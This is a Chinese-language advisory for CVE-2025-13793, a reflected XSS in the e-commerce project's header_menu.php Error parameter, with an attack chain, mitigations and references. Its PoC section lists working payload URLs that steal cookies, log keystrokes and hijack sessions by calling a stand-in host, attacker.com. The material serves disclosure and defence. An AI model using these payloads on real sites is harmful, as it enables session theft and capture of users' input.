CVE-2025-13793: winston-dsouza电商网站header_menu.php存在反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13793

漏洞类型

XSS跨站脚本攻击

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

winston-dsouza Ecommerce-Website

漏洞概述

CVE-2025-13793是winston-dsouza开源电商项目中的一个反射型跨站脚本（XSS）漏洞。该漏洞存在于/includes/header_menu.php文件的GET参数处理逻辑中，攻击者可以通过Error参数注入恶意JavaScript代码。当受害者在浏览器中打开包含恶意载荷的链接时，攻击脚本将在受害者上下文中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于该产品采用滚动发布模式，版本信息不明确，漏洞影响范围可能覆盖所有历史版本。漏洞已于2025年11月30日公开披露，且相关利用代码已公开，厂商在收到提前通知后未做出任何响应。由于攻击需要用户交互（诱导用户点击恶意链接），降低了漏洞的实际利用难度，建议受影响用户尽快采取临时缓解措施或寻找安全的替代方案。

技术细节

该漏洞为反射型XSS（Non-Persistent XSS），攻击原理如下：1. 漏洞位置：/includes/header_menu.php文件中对GET参数Error的处理。2. 漏洞成因：程序未对用户输入的Error参数进行充分的输入验证和输出编码，直接将用户可控的数据嵌入到HTML页面中。3. 攻击方式：攻击者构造恶意URL，如：http://target.com/includes/header_menu.php?Error=<script>alert(document.cookie)</script>，诱导受害者访问。4. 漏洞触发：当受害者访问该URL时，浏览器会解析HTML并将<script>标签内容作为JavaScript执行。5. 影响范围：由于Error参数值会被反射到页面中，任何能够诱导用户点击恶意链接的攻击场景都可能成功。6. 利用场景：可窃取用户会话Cookie、劫持用户操作、注入恶意内容、进行钓鱼攻击等。由于该参数在页面加载时即时反射，无需存储，因此属于反射型XSS。攻击者通常通过社工手段（邮件、社交媒体等）诱导用户点击恶意链接。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的winston-dsouza Ecommerce-Website项目，确认存在/includes/header_menu.php文件

STEP 2

步骤2: 漏洞探测

攻击者构造包含XSS载荷的Error参数请求，如?Error=<script>alert(1)</script>，验证漏洞存在

STEP 3

步骤3: 恶意链接构造

攻击者生成包含恶意JavaScript代码的钓鱼链接，通常使用短链接或社工技巧掩盖恶意意图

STEP 4

步骤4: 社会工程攻击

攻击者通过邮件、社交媒体、即时通讯等方式诱导目标用户点击恶意链接

STEP 5

步骤5: XSS Payload执行

当受害者访问恶意链接时，浏览器解析页面并执行注入的JavaScript代码

STEP 6

步骤6: 恶意操作执行

根据注入的Payload类型，可执行窃取Cookie、劫持会话、注入恶意内容等操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13793 PoC - Reflected XSS in header_menu.php -->
<!-- Target: winston-dsouza Ecommerce-Website /includes/header_menu.php -->
<!-- Attack Vector: GET Parameter 'Error' -->

<!-- Basic XSS PoC -->
http://target.com/includes/header_menu.php?Error=<script>alert('XSS')</script>

<!-- Cookie Stealing PoC -->
http://target.com/includes/header_menu.php?Error=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Keylogger PoC -->
http://target.com/includes/header_menu.php?Error=<script>document.onkeypress=function(e){fetch('https://attacker.com/log?k='+e.key)}</script>

<!-- Session Hijacking PoC -->
http://target.com/includes/header_menu.php?Error=<script>var+img=new+Image();img.src='https://attacker.com/hijack?'+document.cookie;</script>

<!-- HTML Injection + XSS -->
http://target.com/includes/header_menu.php?Error=<img+src=x+onerror='alert(document.domain)'>

影响范围

winston-dsouza Ecommerce-Website <= 87734c043269baac0b4cfe9664784462138b1b2e

所有版本（滚动发布模式，版本信息不可用）

防御指南

临时缓解措施

由于厂商未响应且项目可能已停止维护，建议采取以下临时缓解措施：1. 在Web应用防火墙(WAF)层面添加XSS防护规则，拦截包含<script>、javascript:等关键字的请求参数；2. 对包含Error参数的请求进行严格的输入过滤，过滤<、>、'、"等特殊字符；3. 在所有用户输入输出点实施输出编码，将<编码为<、>编码为>等；4. 配置严格的Content-Security-Policy响应头，限制脚本来源；5. 如果业务允许，暂时禁用或限制访问header_menu.php功能；6. 加强用户安全意识培训，警惕可疑链接；7. 考虑部署自适应的XSS防护方案，如DOMPurify等前端安全库。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13793
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13793
3 Details https://www.cvedetails.com/cve/CVE-2025-13793/
4 VulDB https://vuldb.com/cve/CVE-2025-13793
5 Link https://github.com/dream357/report/blob/main/ecommerce-website.docx
6 Link https://vuldb.com/?ctiid.333797
7 Link https://vuldb.com/?id.333797
8 Link https://vuldb.com/?submit.691622